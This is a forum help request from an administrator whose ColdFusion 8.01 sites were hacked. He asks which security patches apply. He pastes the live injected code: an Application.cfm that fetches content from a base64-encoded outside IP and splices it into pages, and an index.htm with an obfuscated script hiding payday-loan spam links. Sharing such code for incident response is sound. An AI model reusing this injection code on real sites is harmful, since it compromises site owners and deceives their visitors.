1 2 Previous Next 39 Replies Latest reply on Sep 22, 2013 3:03 PM by Cenn Raven

    CF8.01 hacked.  Need info on patches

    Jjboswell Level 1

      Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.

       

      Here's the hack:

       

      1. Application.cfm

      <cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

      <cfset mmy = cfhttp.FileContent><cfoutput>

      #mmy#

      </cfoutput>

      </cfsavecontent>

      <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

      <cfset cfs = cfhttp.FileContent>

      <cfif (FindNoCase("</div>",paga) GT 0)>

      <cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

      <cfelseif (FindNoCase("</table>",paga) GT 0)>

      <cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

      <cfelseif (FindNoCase("</a>",paga) GT 0)>

      <cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>

      <cfelse>

      <cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>

      </cfif>

      <cfoutput>

      #paga#

      </cfoutput>

      <cfabort>

      </cfif>

      <cffunction name="hSWaawe"> 

      <cfargument name="HxzcGlk">

      <cfset Ypg = ToString(ToBinary(HxzcGlk))>

      <cfreturn Ypg>

      </cffunction>

       

       

      1. Index.htm

       

       

      <html>

        <head>

          <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">

        </head>

        <body>

          <br>

          <br>

          <br>

          <br>

          <center>

            <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()

      {

      var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

      t=z='';

      for(v=0;v<m.length;){t+=m.charAt(v++);

      if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

      t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();

      </script>

       

       

       

      <p class="zdroq">

      Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>

          </center>

        </body>

      </html>

       

      Thanks in advance.

       

      --Jeremy

        1 2 Previous Next